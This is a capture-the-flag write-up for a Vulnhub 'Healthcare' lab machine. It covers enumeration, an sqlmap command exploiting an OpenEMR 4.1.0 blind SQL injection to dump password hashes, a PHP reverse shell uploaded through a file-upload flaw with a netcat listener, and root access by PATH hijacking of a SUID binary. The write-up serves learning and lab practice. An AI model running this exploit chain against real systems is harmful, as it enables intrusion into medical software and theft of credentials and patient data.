Healthcare CTF Writeup

Machine Info

This is a modified version of Healthcare on Vulnhub.

Machine IP: 10.0.2.19

Attacking IP: 10.0.2.14

Enumeration

1
2
3
4
5
6
7
8

$ nmap 10.0.2.19 -sV -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 06:54 EST
Nmap scan report for 10.0.2.19
Host is up (0.00056s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))

1
2
3
4
5
6
7

$ gobuster dir \
-w directory-list-2.3-big.txt \
-x php,html,js,txt \
-t 30 \
--url http://10.0.2.19

/openemr

OpenEMR 4.1.0 login page

Blind SQL Injection

OpenEMR is a open-source software for medical things or something, idk, all I know is OpenEMR 4.1.0 has an unauthenticated SQL Injection vulnerability right here on this login form, codenamed CVE-2012-2115 . When we press login, first it will send data to validateuser.php to determine if the user exists. If the user exists, meaning whatever query is running in the backend returns at least one row, the page will return 1. We can inject our SQL here and do a blind SQL attack.

Doing a blind SQL attack manually is boring, I’ll update this article later with the way of the blind, but for now let’s use sqlmap to dump the content of the user table

1

$ sqlmap -u 'http://10.0.2.19/openemr/interface/login/validateUser.php?u=asmin' -D openemr -T users -C username,password --dump

We have the password hashes, CrackStation returned the second hash, and we have the credentials for the user medical:medical.

Remote Code Execution

Once we got inside, we have another CVE to exploit, CVE-2011-5161. This CVE is a fairly simple improper handling of files uploaded by the user. Basically we can upload a file with any name we want, because the software allow us to rename the file.

Navigate to Patient/Client -> New/Search -> Create a new user.

After creating the new user, navigate to Documents -> Patient Photograph.

Here you will see an upload form, we can create a php reverse shell then rename the file to .jpg, then when uploading it, specify the name to be .php again.

After that just have netcat listen on the port of your choice then browse to the web shell.

1
2
3
4
5
6

$ nc -klnvp 1313
listening on [any] 1313 ...
connect to [10.0.2.14] from (UNKNOWN) [10.0.2.19] 49017

sh-4.1$ whoami
apache

Now we escalate.

Do a routine search, for this machine, scanning for SUID binaries caught this one strange looking binary:

1
2
3
4
5
6
7

sh-4.1$ find / -perm -u=s 2>/dev/null
...
/usr/bin/healthcheck
...

sh-4.1$ ls /usr/bin/healthcheck -al
-rwsr-sr-x 1 root root 5813 Jul 29 10:04 /usr/bin/healthcheck

I can’t find information about this binary online, so it must be unique crafted for this machine. We can run this file as root, but all it does is checking the health of the disk and file system and list all the files on the disk.

We can try to decompile the code, but I didn’t find anything interesting. cat-ting the files, on the other hand, is super useful this time;

1
2
3
4
5

sh-4.1$ cat /usr/bin/healthcheck
ELF 4T
...truncated
[��clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h��������
...truncated

Basically this binary is just calling shell commands.

1
2
3
4
5
6
7
8

clear ; 
echo 'System Health Check' ; 
echo '' ; 
echo 'Scanning System' ; 
sleep 2 ; 
ifconfig ; 
fdisk -l ; 
du -h

And they did not specify the absolute path to the files. So we can do a bit of PATH manipulation here and add . (dot) to it, then create our own executable files with the same name as the commands used in the healthcheck binary.

1
2
3
4

sh-4.1$ export PATH=.:$PATH

sh-4.1$ echo $PATH
.:/sbin:/usr/sbin:/bin:/usr/bin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

sh-4.1$ cd /tmp

sh-4.1$ echo $'#!/bin/sh\n/bin/sh' > clear

sh-4.1$ cat clear 
#!/bin/sh
/bin/sh

sh-4.1$ healthcheck

$ whoami
root

$ cat healthcheck.c
#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h");
}

In the above code I have created a shell script named clear that spawn a shell. This coupled with the fact that there is a . at the beginning my PATH means that when I call clear without the path to the binary the shell script I created will be executed instead of any other binaries named clear in any other PATH directory. This tripled with the fact that the healthcheck binary does not specify the path to the shell commands it uses means that the shell will look for the actual binaries in the directories in PATH.

All of this combined created a perfect storm for me to climb to the top of the system and obtain root.

Tools used

1. PentestMonkey PHP Reverse Shell

Further reading

1. CVE-2012-2115
2. CVE-2011-5161
3. Linux Privilege Escalation Using PATH Variable